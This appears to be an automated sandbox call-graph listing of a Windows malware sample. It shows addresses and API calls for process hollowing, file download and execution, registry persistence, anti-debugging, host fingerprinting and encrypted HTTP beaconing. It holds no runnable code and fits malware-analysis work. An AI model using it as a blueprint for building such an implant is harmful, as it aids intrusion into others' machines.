4700->4701 4701->4498 4861 77395c RegOpenKeyA 4703->4861 4705 774a3c 4706 774a4a RegDeleteValueA 4705->4706 4862 773890 RegCloseKey 4706->4862 4708 774a63 4708->4499 4709->4510 4863 778aa4 6 API calls 4709->4863 4711 777493 4710->4711 4712 7772c4 17 API calls 4711->4712 4713 77749e 4712->4713 4714 775894 6 API calls 4713->4714 4715 7774be 4714->4715 4864 7713dc GetProcessHeap RtlAllocateHeap 4715->4864 4717 7774c6 4718 775894 6 API calls 4717->4718 4719 7774e6 4718->4719 4720 7774ef RegCreateKeyExA 4719->4720 4721 777515 RegCreateKeyExA 4719->4721 4722 777539 4720->4722 4721->4722 4865 773930 RegSetValueExA 4722->4865 4724 777550 4866 773890 RegCloseKey 4724->4866 4726 77755b 4726->4510 4727->4520 4728->4525 4867 77133c 4729->4867 4731 77567c FindFirstFileA 4736 7756ab 4731->4736 4732 775839 FindClose 4732->4530 4733 77581a FindNextFileA 4733->4732 4733->4736 4735 7747ac 6 API calls 4735->4736 4736->4732 4736->4733 4736->4735 4740 775759 4736->4740 4869 773988 FindFirstFileA FindClose 4736->4869 4871 771828 VirtualFree 4736->4871 4739 775810 4739->4732 4870 771828 VirtualFree 4740->4870 4872 7713dc GetProcessHeap RtlAllocateHeap 4741->4872 4743 7784c1 4746 778514 Sleep 4743->4746 4747 778521 4743->4747 4873 775ae8 4743->4873 4744 7764bc 7 API calls 4744->4747 4746->4743 4747->4744 4748 771864 wsprintfA 4747->4748 4751 7786e3 GetTickCount 4747->4751 4753 775d20 29 API calls 4747->4753 4754 775468 GetSystemTime 4747->4754 4756 777474 27 API calls 4747->4756 4757 778957 Sleep 4747->4757 4760 7780c0 33 API calls 4747->4760 4761 771440 GetProcessHeap HeapFree 4747->4761 4883 778258 WSAStartup gethostname gethostbyname 4747->4883 4888 774154 GetKeyboardLayoutList 4747->4888 4890 7782f8 4747->4890 4910 771440 GetProcessHeap HeapFree 4747->4910 4911 777f20 4747->4911 4915 771440 GetProcessHeap HeapFree 4747->4915 4916 77660c 4747->4916 4748->4747 4751->4747 4752 7786fd Sleep 4751->4752 4752->4747 4753->4747 4754->4747 4756->4747 4757->4747 4757->4757 4760->4747 4761->4747 
4764 7788b4 RtlExitUserThread 4764->4747 4765 778877 RtlExitUserThread 4765->4747 4766->4561 4767->4569 4768->4566 4769->4586 4770->4596 4771->4598 4772->4600 4773->4610 4774->4614 4775->4616 4776->4618 4777->4620 4778->4607 4779->4628 4780->4635 4781->4639 4782->4641 4783->4643 4785 7772dc 4784->4785 4791 776eec 4785->4791 4788->4649 4789->4636 4790->4632 4814 773f38 4791->4814 4793 776f04 LoadLibraryA 4817 771440 GetProcessHeap HeapFree 4793->4817 4795 776f1c 4796 7770c7 4795->4796 4797 771994 2 API calls 4795->4797 4796->4648 4798 776f33 4797->4798 4799 771994 2 API calls 4798->4799 4800 776f45 4799->4800 4801 771994 2 API calls 4800->4801 4802 776f57 4801->4802 4803 771994 2 API calls 4802->4803 4804 776f69 SetupDiGetClassDevsA SetupDiEnumDeviceInfo SetupDiGetDeviceRegistryPropertyA 4803->4804 4818 7712dc 4804->4818 4807 773f38 2 API calls 4808 777001 4807->4808 4809 77701d SetupDiGetClassDevsA SetupDiEnumDeviceInfo SetupDiGetDeviceRegistryPropertyA 4808->4809 4810 7712dc 4809->4810 4811 77708e CharLowerBuffA SetupDiDestroyDeviceInfoList 4810->4811 4812 7770b4 4811->4812 4820 771440 GetProcessHeap HeapFree 4812->4820 4821 7713dc GetProcessHeap RtlAllocateHeap 4814->4821 4816 773f6c 4816->4793 4816->4816 4817->4795 4819 7712f0 CharLowerBuffA SetupDiDestroyDeviceInfoList 4818->4819 4819->4807 4820->4796 4821->4816 4823 77756c 4822->4823 4824 773b80 2 API calls 4823->4824 4825 7775a5 4824->4825 4828 771440 GetProcessHeap HeapFree 4825->4828 4827 7775c3 4827->4660 4828->4827 4830 778aaf 4829->4830 4831 778ad4 RegisterClassExA CreateWindowExA 4830->4831 4832 778b31 4831->4832 4833 778b5b RtlExitUserThread 4831->4833 4834 778b47 GetMessageA 4832->4834 4834->4833 4835 778b33 TranslateMessage DispatchMessageA 4834->4835 4835->4834 4836->4667 4837->4668 4838->4671 4839->4672 4840->4674 4841->4679 4842->4687 4843->4685 4844->4698 4847 774627 4845->4847 4848 774645 CreateFileA 4847->4848 4851 774639 4847->4851 4857 7746e5 Sleep 4847->4857 4858 7746f6 Sleep 4847->4858 4859 
773988 FindFirstFileA FindClose 4847->4859 4849 77466a GetFileSize 4848->4849 4850 7746c6 DeleteFileA 4848->4850 4852 774684 4849->4852 4853 7746b2 FlushFileBuffers CloseHandle 4849->4853 4850->4847 4850->4851 4860 771440 GetProcessHeap HeapFree 4851->4860 4855 77468e WriteFile 4852->4855 4853->4850 4855->4853 4855->4855 4856 774712 4856->4701 4857->4847 4858->4847 4859->4847 4860->4856 4861->4705 4862->4708 4864->4717 4865->4724 4866->4726 4868 771345 4867->4868 4868->4731 4869->4736 4870->4739 4871->4733 4872->4743 4874 775b06 4873->4874 4875 775d12 4874->4875 4877 77170c InternetSetOptionA 4874->4877 4881 77151c InternetCloseHandle 4874->4881 4934 773864 InternetOpenA 4874->4934 4935 77161c InternetConnectA 4874->4935 4936 771660 HttpOpenRequestA 4874->4936 4937 7715e4 HttpSendRequestA 4874->4937 4938 7739cc HttpQueryInfoA 4874->4938 4875->4743 4877->4874 4881->4874 4884 7782ef 4883->4884 4885 77829b 4883->4885 4884->4747 4886 7782ab inet_ntoa 4885->4886 4887 7782e9 WSACleanup 4885->4887 4886->4885 4887->4884 4889 774178 4888->4889 4889->4747 4891 778317 4890->4891 4892 778481 4891->4892 4893 77833e 4891->4893 4942 777290 CreateThread CloseHandle 4892->4942 4895 778358 GetTempPathA 4893->4895 4908 778416 4893->4908 4896 777560 4 API calls 4895->4896 4897 778375 4896->4897 4898 7783cd 4897->4898 4899 77842b 4897->4899 4901 77485c 4 API calls 4898->4901 4940 771828 VirtualFree 4899->4940 4903 7783de Sleep CreateProcessA 4901->4903 4902 77843c 4941 7713b4 VirtualAlloc 4902->4941 4905 77841f 4903->4905 4903->4908 4939 777290 CreateThread CloseHandle 4905->4939 4906 778449 4909 778459 wsprintfA 4906->4909 4908->4747 4909->4908 4910->4765 4912 777f3a 4911->4912 4913 77804e 4912->4913 4943 777e28 4912->4943 4913->4747 4915->4764 4917 7764bc 7 API calls 4916->4917 4931 776630 4917->4931 4918 7766fd GetTickCount 4918->4931 4919 7766f0 Sleep 4919->4931 4920 775d20 29 API calls 4920->4931 4921 7766de 5043 771440 GetProcessHeap HeapFree 4921->5043 4923 7767af GetTickCount 
4924 7767c4 Sleep 4923->4924 4923->4931 4924->4931 4925 775468 GetSystemTime 4925->4931 4926 77678d 5044 771440 GetProcessHeap HeapFree 4926->5044 4928 7766e6 4928->4747 4929 7767ee Sleep 5045 775620 4929->5045 4931->4918 4931->4919 4931->4920 4931->4921 4931->4923 4931->4925 4931->4926 4931->4929 4932 775ae8 7 API calls 4931->4932 4933 77680a Sleep 4931->4933 4932->4931 4933->4931 4934->4874 4935->4874 4936->4874 4937->4874 4938->4874 4939->4908 4940->4902 4941->4906 4942->4908 4944 777e49 4943->4944 4945 777e6d 4943->4945 4947 777e5a 4944->4947 4953 777eed 4944->4953 4954 777e68 4944->4954 4946 777e7f lstrcmpi 4945->4946 4945->4954 4948 777eac 4946->4948 4955 777e93 4946->4955 4949 777e61 4947->4949 4950 777eb8 4947->4950 4951 777240 36 API calls 4948->4951 4949->4954 4957 777474 27 API calls 4949->4957 4959 777d3c GetTempPathA 4950->4959 4951->4954 4958 777474 27 API calls 4953->4958 4954->4912 4956 777474 27 API calls 4955->4956 4956->4954 4957->4954 4958->4954 4960 777d6e 4959->4960 4970 777e18 4960->4970 4971 773c28 4960->4971 4963 777db9 ShellExecuteA 4966 777dd9 4963->4966 4963->4970 4964 777e1a 4965 777240 36 API calls 4964->4965 4965->4970 5002 771864 wsprintfA 4966->5002 4968 777de6 4969 777240 36 API calls 4968->4969 4969->4970 4970->4954 4972 773c45 4971->4972 4974 773c4a 4971->4974 5003 773a04 4972->5003 5022 773864 InternetOpenA 4974->5022 4976 773d01 5023 77161c InternetConnectA 4976->5023 4978 773d36 5024 771660 HttpOpenRequestA 4978->5024 4980 773d6f 4981 773dac 4980->4981 5025 7716d8 InternetQueryOptionA 4980->5025 5027 7715e4 HttpSendRequestA 4981->5027 4984 773dbc 5028 7739cc HttpQueryInfoA 4984->5028 4985 773d93 5026 77170c InternetSetOptionA 4985->5026 4988 773de5 4989 773df2 CreateFileA 4988->4989 4990 773e78 4988->4990 4989->4990 4992 773e17 4989->4992 5031 77151c InternetCloseHandle 4990->5031 5001 773e67 CloseHandle 4992->5001 5029 7716a4 InternetQueryDataAvailable 4992->5029 5030 7715b0 InternetReadFile 4992->5030 4993 773e80 5032 77151c 
InternetCloseHandle 4993->5032 4996 773e88 5033 77151c InternetCloseHandle 4996->5033 4998 773e40 WriteFile 4998->4992 5000 773e90 5000->4963 5000->4964 5001->4990 5002->4968 5034 77395c RegOpenKeyA 5003->5034 5005 773a27 5035 7738b0 RegQueryValueExA 5005->5035 5007 773a43 5036 773890 RegCloseKey 5007->5036 5009 773a4e 5037 77395c RegOpenKeyA 5009->5037 5011 773a8e 5038 7738b0 RegQueryValueExA 5011->5038 5013 773aac 5039 773890 RegCloseKey 5013->5039 5015 773ab7 5040 77395c RegOpenKeyA 5015->5040 5018 773ade 5019 773b49 5018->5019 5041 7738fc RegEnumValueA 5018->5041 5042 773890 RegCloseKey 5019->5042 5021 773b63 5021->4974 5022->4976 5023->4978 5024->4980 5025->4985 5026->4981 5027->4984 5028->4988 5029->4992 5030->4998 5031->4993 5032->4996 5033->5000 5034->5005 5035->5007 5036->5009 5037->5011 5038->5013 5039->5015 5040->5018 5041->5018 5042->5021 5043->4928 5044->4928 5046 775635 5045->5046 5048 7714f8 InternetGetConnectedState 5045->5048 5046->4931 5048->5046 5131 779230 5132 779232 5131->5132 5133 779254 Sleep 5132->5133 5134 779268 5132->5134 5133->5134 5142 776e04 GetModuleFileNameA CharUpperBuffA 5134->5142 5137 7792bb 5138 7792b3 5141 7769bc 12 API calls 5138->5141 5139 779285 OpenMutexA 5139->5138 5140 7792a1 CloseHandle ExitProcess 5139->5140 5141->5137 5143 773f38 2 API calls 5142->5143 5144 776e47 5143->5144 5155 771440 GetProcessHeap HeapFree 5144->5155 5146 776e6b 5147 773f38 2 API calls 5146->5147 5148 776e75 5147->5148 5156 771440 GetProcessHeap HeapFree 5148->5156 5150 776e99 5151 773f38 2 API calls 5150->5151 5152 776ea3 5151->5152 5157 771440 GetProcessHeap HeapFree 5152->5157 5154 776ec7 5154->5137 5154->5138 5154->5139 5155->5146 5156->5150 5157->5154 5540 7780be 5541 7780c0 5540->5541 5542 7780e1 CreateEventA WaitForSingleObject CloseHandle 5541->5542 5543 7780d5 RtlRemoveVectoredExceptionHandler 5541->5543 5544 778128 5542->5544 5543->5542 5545 77471c 17 API calls 5544->5545 5546 77815d 5545->5546 5547 77471c 17 API calls 5546->5547 5548 
77816f 5547->5548 5549 77818a 5548->5549 5550 778178 SendMessageA 5548->5550 5551 7781d3 5549->5551 5552 778193 5549->5552 5550->5549 5553 7781d9 5551->5553 5554 7781f0 SHDeleteKeyA 5551->5554 5555 778199 5552->5555 5556 7781b0 SHDeleteKeyA 5552->5556 5557 778064 3 API calls 5553->5557 5559 7781ee 5554->5559 5558 778064 3 API calls 5555->5558 5561 7781ae 5556->5561 5557->5559 5558->5561 5560 774a1c 3 API calls 5559->5560 5563 7781d1 5559->5563 5560->5563 5562 774a1c 3 API calls 5561->5562 5562->5563 5568 771828 VirtualFree 5563->5568 5565 77821b ReleaseMutex CloseHandle 5566 778242 ExitProcess 5565->5566 5567 77824a 5565->5567 5568->5565 5569 777278 5570 777240 36 API calls 5569->5570 5571 777283 RtlExitUserThread 5570->5571 5572 773f36 5573 773f38 5572->5573 5576 7713dc GetProcessHeap RtlAllocateHeap 5573->5576 5575 773f6c 5576->5575 5577 776db0 5578 776dd1 5577->5578 5580 776dbe 5577->5580 5579 776dd3 Sleep GetTickCount 5578->5579 5580->5579 5581 776dc8 GetTickCount 5580->5581 5581->5578 5158 771aae 5159 771ab0 5158->5159 5160 771aee 5159->5160 5161 771ac9 CryptEncrypt 5159->5161 5161->5160 5582 774b9b 5583 774ba0 GetComputerNameA 5582->5583 5584 774beb RegOpenKeyExA 5583->5584 5585 774bcd 5583->5585 5597 7738b0 RegQueryValueExA 5584->5597 5585->5584 5588 774c2c 5598 7738b0 RegQueryValueExA 5588->5598 5590 774c76 5599 7738b0 RegQueryValueExA 5590->5599 5592 774cc0 5600 7738b0 RegQueryValueExA 5592->5600 5593 774d0c 5601 773890 RegCloseKey 5593->5601 5595 774d17 GetVolumeInformationA 5596 774d60 5595->5596 5597->5588 5598->5590 5599->5592 5600->5593 5601->5595 5602 7791fa 5603 7791fc 5602->5603 5608 774a68 GetComputerNameA 5603->5608 5605 779216 5606 7769bc 12 API calls 5605->5606 5607 77921e 5606->5607 5609 774aa3 RegOpenKeyExA 5608->5609 5610 774a95 5608->5610 5626 7738b0 RegQueryValueExA 5609->5626 5610->5609 5612 774ae6 5627 773890 RegCloseKey 5612->5627 5614 774af1 5615 7744f0 GetVersionExA 5614->5615 5616 774b12 GetCurrentProcess 5615->5616 5617 7742d4 11 
API calls 5616->5617 5618 774b22 5617->5618 5619 7744f0 GetVersionExA 5618->5619 5620 774b2c 5619->5620 5621 774b41 GetCurrentProcess 5620->5621 5622 774b31 5620->5622 5624 7742d4 11 API calls 5621->5624 5623 7741cc 14 API calls 5622->5623 5625 774b36 5623->5625 5624->5625 5625->5605 5626->5612 5627->5614 5628 7792cd 5631 7792cf GetModuleFileNameA 5628->5631 5635 777c50 CreateFileA 5631->5635 5633 7769bc 12 API calls 5634 779335 5633->5634 5636 777c9c 5635->5636 5637 777c80 CreateFileA 5635->5637 5638 777ca2 ReadFile SetFilePointer ReadFile CloseHandle 5636->5638 5639 777cf3 wsprintfA GetCursorPos 5636->5639 5637->5636 5638->5639 5639->5633 5640 774406 5641 774408 InitializeSecurityDescriptor 5640->5641 5642 77442d SetSecurityDescriptorDacl 5641->5642 5645 7744bb 5641->5645 5643 774445 ConvertStringSecurityDescriptorToSecurityDescriptorA 5642->5643 5642->5645 5644 774463 GetSecurityDescriptorSacl 5643->5644 5643->5645 5646 7744a8 LocalFree 5644->5646 5647 774488 SetSecurityDescriptorSacl 5644->5647 5646->5645 5647->5645 5647->5646 5162 776d40 IsDebuggerPresent 5648 776dc8 GetTickCount 5649 776dd1 Sleep GetTickCount 5648->5649 5170 776900 GetComputerNameA 5171 77694f RegOpenKeyExA 5170->5171 5174 776931 5170->5174 5177 7738b0 RegQueryValueExA 5171->5177 5173 776992 5178 773890 RegCloseKey 5173->5178 5174->5171 5176 77699d 5177->5173 5178->5176 5163 779178 5164 77917a 5163->5164 5169 773b6c GetCommandLineA 5164->5169 5166 77918f 5167 7769bc 12 API calls 5166->5167 5168 77919a 5167->5168 5169->5166 5179 779530 5180 779540 5179->5180 5183 779470 5180->5183 5182 779545 5184 779479 CreateThread RtlExitUserThread 5183->5184 5185 7790b8 18 API calls 5183->5185 5184->5182 5186 779124 12 API calls 5184->5186 5185->5184 5256 776d55 5257 776d64 5256->5257 5258 773f38 2 API calls 5257->5258 5259 776d79 GetModuleHandleA 5258->5259 5262 771440 GetProcessHeap HeapFree 5259->5262 5261 776d9a 5262->5261 5187 779347 5189 779349 GetCurrentProcess 5187->5189 5190 77453c 2 API calls 
5189->5190 5191 779364 5190->5191 5192 779391 GetWindowsDirectoryA 5191->5192 5193 779368 GetWindowsDirectoryA 5191->5193 5194 77938c 5192->5194 5193->5194 5204 775028 5194->5204 5197 779459 ExitProcess 5198 7793f9 SHGetSpecialFolderPathA 5199 77133c 5198->5199 5200 77941e PathFileExistsA 5199->5200 5200->5197 5201 779432 5200->5201 5202 775028 28 API calls 5201->5202 5203 779453 5202->5203 5203->5197 5205 77503e GetModuleHandleA 5204->5205 5207 775049 5204->5207 5205->5207 5206 77506e CreateProcessA 5208 7752ce 5206->5208 5209 7750a3 5206->5209 5207->5206 5208->5197 5208->5198 5210 7750c4 CreateFileMappingA MapViewOfFile 5209->5210 5211 775124 5210->5211 5227 7713b4 VirtualAlloc 5211->5227 5213 775169 5228 774ef0 5213->5228 5215 7751db 5217 7751f4 GetThreadContext 5215->5217 5221 775213 5215->5221 5217->5221 5218 775240 VirtualProtectEx WriteProcessMemory 5248 771828 VirtualFree 5218->5248 5219 775233 5219->5208 5219->5218 5221->5219 5242 774de0 5221->5242 5222 77527a ResumeThread 5223 7752ac 5222->5223 5224 77528a WaitForSingleObject 5222->5224 5226 7752ba CloseHandle CloseHandle 5223->5226 5224->5223 5225 77529c GetExitCodeProcess 5224->5225 5225->5226 5226->5208 5227->5213 5249 7713dc GetProcessHeap RtlAllocateHeap 5228->5249 5230 774f0d 5250 774e94 NtQueryInformationProcess 5230->5250 5233 774f25 ReadProcessMemory 5234 774ffd 5233->5234 5235 774f4e ReadProcessMemory 5233->5235 5254 771440 GetProcessHeap HeapFree 5234->5254 5235->5234 5237 774f7d 5235->5237 5237->5234 5239 774fa5 ReadProcessMemory 5237->5239 5238 775019 5238->5215 5239->5234 5240 774fcc 5239->5240 5240->5234 5241 774fd8 ReadProcessMemory 5240->5241 5241->5234 5255 771258 5242->5255 5244 774dfb NtQueryInformationProcess 5245 774e8d 5244->5245 5246 774e18 5244->5246 5245->5219 5246->5245 5247 774e1e ReadProcessMemory ReadProcessMemory ReadProcessMemory 5246->5247 5247->5245 5248->5222 5249->5230 5251 774ebc 5250->5251 5252 774ee9 5250->5252 5251->5252 5253 774ec2 ReadProcessMemory 5251->5253 
5252->5233 5252->5234 5253->5252 5254->5238 5255->5244 5651 775614 5654 7714f8 InternetGetConnectedState 5651->5654 5653 775635 5654->5653 3598 778bf8 RegOpenKeyExA 3600 778c4b 3598->3600 3605 7738b0 RegQueryValueExA 3598->3605 3606 7738b0 RegQueryValueExA 3600->3606 3602 778c97 3607 773890 RegCloseKey 3602->3607 3604 778ca2 3605->3600 3606->3602 3607->3604 5655 7782f4 5656 7782f8 5655->5656 5657 778481 5656->5657 5659 77833e 5656->5659 5678 777290 CreateThread CloseHandle 5657->5678 5660 778358 GetTempPathA 5659->5660 5673 778416 5659->5673 5661 777560 4 API calls 5660->5661 5662 778375 5661->5662 5663 7783cd 5662->5663 5664 77842b 5662->5664 5666 77485c 4 API calls 5663->5666 5676 771828 VirtualFree 5664->5676 5668 7783de Sleep CreateProcessA 5666->5668 5667 77843c 5677 7713b4 VirtualAlloc 5667->5677 5670 77841f 5668->5670 5668->5673 5675 777290 CreateThread CloseHandle 5670->5675 5671 778449 5674 778459 wsprintfA 5671->5674 5674->5673 5675->5673 5676->5667 5677->5671 5678->5673 5679 771860 wsprintfA 5263 7789d2 5264 7789d4 GetVolumeInformationA 5263->5264 5265 778a0c 5264->5265 5266 7741c8 5267 7741cc GetCurrentThread OpenThreadToken 5266->5267 5268 7741f4 GetLastError 5267->5268 5270 774217 5267->5270 5269 774201 GetCurrentProcess OpenProcessToken 5268->5269 5268->5270 5269->5270 5271 7742cc 5270->5271 5281 7713dc GetProcessHeap RtlAllocateHeap 5270->5281 5273 77422b GetTokenInformation CloseHandle 5274 77425a AllocateAndInitializeSid 5273->5274 5275 7742c4 5273->5275 5277 7742ba FreeSid 5274->5277 5279 774288 5274->5279 5282 771440 GetProcessHeap HeapFree 5275->5282 5277->5275 5278 774293 EqualSid 5278->5279 5280 7742ac 5278->5280 5279->5277 5279->5278 5280->5277 5281->5273 5282->5271 5283 776d64 5284 773f38 2 API calls 5283->5284 5285 776d79 GetModuleHandleA 5284->5285 5288 771440 GetProcessHeap HeapFree 5285->5288 5287 776d9a 5288->5287 5680 777982 5681 777984 GetVolumeInformationA 5680->5681 5682 776cfc 5683 773f38 2 API calls 5682->5683 5684 776d0c 
5683->5684 5687 771440 GetProcessHeap HeapFree 5684->5687 5686 776d36 5687->5686 5688 777118 5689 773f38 2 API calls 5688->5689 5690 777130 RegOpenKeyExA 5689->5690 5705 771440 GetProcessHeap HeapFree 5690->5705 5692 777155 5693 773f38 2 API calls 5692->5693 5694 777166 5693->5694 5706 7738b0 RegQueryValueExA 5694->5706 5696 7771bb 5708 771440 GetProcessHeap HeapFree 5696->5708 5697 777185 5697->5696 5698 773f38 2 API calls 5697->5698 5700 777196 5698->5700 5707 771440 GetProcessHeap HeapFree 5700->5707 5701 7771c3 5709 773890 RegCloseKey 5701->5709 5703 7771cb 5705->5692 5706->5697 5707->5696 5708->5701 5709->5703 5289 771402 5290 771404 5289->5290 5291 771436 5290->5291 5292 77141d CryptHashData 5290->5292 5292->5291 5293 774960 5294 77498a SHGetValueA 5293->5294 5295 7748dc 5293->5295 5296 7749bb RegOpenKeyExA 5294->5296 5297 774a12 5294->5297 5295->5294 5296->5297 5298 7749da 5296->5298 5302 773930 RegSetValueExA 5298->5302 5300 7749fb 5303 773890 RegCloseKey 5300->5303 5302->5300 5303->5297 5710 776cf0 5711 776cfc 5710->5711 5712 773f38 2 API calls 5711->5712 5713 776d0c 5712->5713 5716 771440 GetProcessHeap HeapFree 5713->5716 5715 776d36 5716->5715 5717 778a44 5718 778a5d PostQuitMessage 5717->5718 5719 778a56 5717->5719 5721 778a9b 5718->5721 5720 778a5b 5719->5720 5723 7778fc 56 API calls 5719->5723 5720->5721 5722 778a82 NtdllDefWindowProc_A 5720->5722 5722->5721 5723->5720 5304 77584c 5305 775858 5304->5305 5306 7717e8 CryptAcquireContextA 5305->5306 5307 775877 5306->5307 5308 77153c CryptGenRandom 5307->5308 5309 775885 5308->5309 5310 771b20 CryptReleaseContext 5309->5310 5311 77588f 5310->5311 5724 778977 5727 771440 GetProcessHeap HeapFree 5724->5727 5726 77897f 5727->5726 5312 779147 5313 779149 5312->5313 5314 7769bc 12 API calls 5313->5314 5315 779166 5314->5315 5728 776ece 5729 776f21 5728->5729 5730 776ed3 5728->5730 5731 776f33 5729->5731 5732 771994 2 API calls 5729->5732 5733 776ed5 5730->5733 5735 776ea4 5730->5735 5734 771994 2 API calls 
5731->5734 5732->5731 5737 773f38 2 API calls 5733->5737 5736 776f45 5734->5736 5758 771440 GetProcessHeap HeapFree 5735->5758 5738 771994 2 API calls 5736->5738 5740 776f04 LoadLibraryA 5737->5740 5741 776f57 5738->5741 5759 771440 GetProcessHeap HeapFree 5740->5759 5744 771994 2 API calls 5741->5744 5742 776ec7 5746 776f69 SetupDiGetClassDevsA SetupDiEnumDeviceInfo SetupDiGetDeviceRegistryPropertyA 5744->5746 5745 776f1c 5747 7770c7 5745->5747 5749 771994 2 API calls 5745->5749 5748 7712dc 5746->5748 5750 776fdf CharLowerBuffA SetupDiDestroyDeviceInfoList 5748->5750 5749->5731 5751 773f38 2 API calls 5750->5751 5752 777001 5751->5752 5753 77701d SetupDiGetClassDevsA SetupDiEnumDeviceInfo SetupDiGetDeviceRegistryPropertyA 5752->5753 5754 7712dc 5753->5754 5755 77708e CharLowerBuffA SetupDiDestroyDeviceInfoList 5754->5755 5756 7770b4 5755->5756 5760 771440 GetProcessHeap HeapFree 5756->5760 5758->5742 5759->5745 5760->5747 5761 7717a2 5762 7717a4 5761->5762 5763 7717de 5762->5763 5764 7717bd CryptDecrypt 5762->5764 5764->5763 5316 777c4e 5317 777c50 CreateFileA 5316->5317 5318 777c9c 5317->5318 5319 777c80 CreateFileA 5317->5319 5320 777ca2 ReadFile SetFilePointer ReadFile CloseHandle 5318->5320 5321 777cf3 5318->5321 5319->5318 5320->5321 5322 775d1c 5323 776332 5322->5323 5324 775d38 5322->5324 5324->5323 5325 7754b8 wsprintfA 5324->5325 5326 775dde 5325->5326 5327 775858 3 API calls 5326->5327 5328 775dee 5327->5328 5329 775858 3 API calls 5328->5329 5330 775dfe 5329->5330 5331 7717e8 CryptAcquireContextA 5330->5331 5332 775e5f 5331->5332 5333 7718a0 CryptImportKey 5332->5333 5334 775e77 5333->5334 5335 771ab0 CryptEncrypt 5334->5335 5336 775e9d 5335->5336 5337 771af8 CryptDestroyKey 5336->5337 5338 775ea5 5337->5338 5339 771b20 CryptReleaseContext 5338->5339 5340 775eaf 5339->5340 5424 773864 InternetOpenA 5340->5424 5342 775ed6 5425 77170c InternetSetOptionA 5342->5425 5344 775ef2 5426 77170c InternetSetOptionA 5344->5426 5346 775f0b 5427 77170c 
InternetSetOptionA 5346->5427 5348 775f24 5428 77170c InternetSetOptionA 5348->5428 5350 775f36 5429 77170c InternetSetOptionA 5350->5429 5352 775f4f 5354 775f76 5352->5354 5430 77170c InternetSetOptionA 5352->5430 5431 77161c InternetConnectA 5354->5431 5356 775fa8 5432 771660 HttpOpenRequestA 5356->5432 5358 776013 5359 776050 5358->5359 5433 7716d8 InternetQueryOptionA 5358->5433 5360 7760b0 5359->5360 5361 776056 5359->5361 5436 7713dc GetProcessHeap RtlAllocateHeap 5360->5436 5363 775894 6 API calls 5361->5363 5366 77606d 5363->5366 5364 776037 5434 77170c InternetSetOptionA 5364->5434 5435 7713dc GetProcessHeap RtlAllocateHeap 5366->5435 5369 77607a 5373 775894 6 API calls 5369->5373 5370 7760ae 5437 7715e4 HttpSendRequestA 5370->5437 5372 7760f6 5374 7760fa 5372->5374 5375 776107 5372->5375 5373->5370 5438 771440 GetProcessHeap HeapFree 5374->5438 5439 771440 GetProcessHeap HeapFree 5375->5439 5378 77610f 5440 7739cc HttpQueryInfoA 5378->5440 5380 776138 5423 776102 5380->5423 5441 7713dc GetProcessHeap RtlAllocateHeap 5380->5441 5382 776322 5451 77151c InternetCloseHandle 5382->5451 5385 77632a 5452 77151c InternetCloseHandle 5385->5452 5388 7761c5 5390 7761cb 5388->5390 5391 7761d8 5388->5391 5389 77614f 5389->5388 5389->5423 5442 7716a4 InternetQueryDataAvailable 5389->5442 5443 771460 GetProcessHeap RtlReAllocateHeap 5389->5443 5444 7715b0 InternetReadFile 5389->5444 5445 771440 GetProcessHeap HeapFree 5390->5445 5446 7713dc GetProcessHeap RtlAllocateHeap 5391->5446 5395 7761e1 5397 7759bc 6 API calls 5395->5397 5398 77620f 5397->5398 5399 7717e8 CryptAcquireContextA 5398->5399 5400 776222 5399->5400 5401 771374 CryptCreateHash 5400->5401 5402 776237 5401->5402 5403 771404 CryptHashData 5402->5403 5404 77624c 5403->5404 5405 771404 CryptHashData 5404->5405 5406 776261 5405->5406 5407 771404 CryptHashData 5406->5407 5408 77627e 5407->5408 5409 771404 CryptHashData 5408->5409 5410 776292 5409->5410 5411 771490 CryptGetHashParam 5410->5411 5412 7762b2 
5411->5412 5413 7714d0 CryptDestroyHash 5412->5413 5414 7762ba 5413->5414 5415 771b20 CryptReleaseContext 5414->5415 5416 7762c4 5415->5416 5417 7762db 5416->5417 5418 7762fd 5416->5418 5447 771440 GetProcessHeap HeapFree 5417->5447 5449 771440 GetProcessHeap HeapFree 5418->5449 5421 7762e3 5448 771440 GetProcessHeap HeapFree 5421->5448 5450 77151c InternetCloseHandle 5423->5450 5424->5342 5425->5344 5426->5346 5427->5348 5428->5350 5429->5352 5430->5354 5431->5356 5432->5358 5433->5364 5434->5359 5435->5369 5436->5370 5437->5372 5438->5423 5439->5378 5440->5380 5441->5389 5442->5389 5443->5389 5444->5389 5445->5423 5446->5395 5447->5421 5448->5423 5449->5423 5450->5382 5451->5385 5452->5323 3608 778a48 3609 778a5d PostQuitMessage 3608->3609 3610 778a56 3608->3610 3612 778a9b 3609->3612 3611 778a5b 3610->3611 3615 7778fc 3610->3615 3611->3612 3613 778a82 NtdllDefWindowProc_A 3611->3613 3613->3612 3626 7738dc RtlEnterCriticalSection 3615->3626 3617 77790f 3618 777944 3617->3618 3620 77793c 3617->3620 3621 777946 3617->3621 3655 7738ec RtlLeaveCriticalSection 3618->3655 3627 7776a0 3620->3627 3622 77794f SHDeleteKeyA 3621->3622 3623 777962 SHDeleteKeyA 3621->3623 3622->3618 3623->3618 3624 77797d 3624->3611 3626->3617 3628 7776b9 3627->3628 3654 7777ba 3627->3654 3628->3654 3656 773fc8 CoInitialize 3628->3656 3630 777893 3633 774968 4 API calls 3630->3633 3631 777776 3662 774968 3631->3662 3637 7778a3 3633->3637 3634 777786 3635 7777bf 3634->3635 3636 77779a 3634->3636 3634->3654 3684 773b80 3635->3684 3671 77485c CreateFileA 3636->3671 3639 77485c 4 API calls 3637->3639 3637->3654 3643 7778d5 3639->3643 3641 777712 3641->3630 3641->3631 3644 77763c 39 API calls 3643->3644 3644->3654 3646 77781d 3687 771440 GetProcessHeap HeapFree 3646->3687 3648 777838 3649 777846 MoveFileExA 3648->3649 3650 777866 3649->3650 3649->3654 3651 77485c 4 API calls 3650->3651 3650->3654 3652 777886 3651->3652 3653 77763c 39 API calls 3652->3653 3653->3654 3654->3618 3655->3624 3658 
